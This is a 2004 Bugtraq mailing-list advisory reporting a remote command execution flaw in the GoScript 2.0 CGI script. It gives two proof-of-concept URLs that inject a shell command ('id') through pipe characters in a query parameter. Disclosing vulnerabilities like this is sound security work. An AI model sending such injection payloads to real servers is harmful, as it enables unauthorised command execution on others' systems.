[35963] in bugtraq
GoScript Remote Command Execution
daemon@ATHENA.MIT.EDU (Francisco Alisson)
Wed Aug 4 17:01:09 2004
Date: 4 Aug 2004 04:28:11 -0000
Message-ID: <20040804042811.18391.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Francisco Alisson <dominusvis@click21.com.br>
To: bugtraq@securityfocus.com
GoScript Remote Command Execution
Version verified: 2.0
Author: Pete Stein http://www.slack.net/~pete/perl
GoScript v2.0 allow remote commando execution as we can see below:
http://www.server.com/go.cgi?|id|
http://www.server.com/go.cgi?artarchive=|id|
May be possible another methods of attack!
Thanks :)
[Infektion Group]
irc.phey.net 6667 -j #infektion
<Dominus_Vis>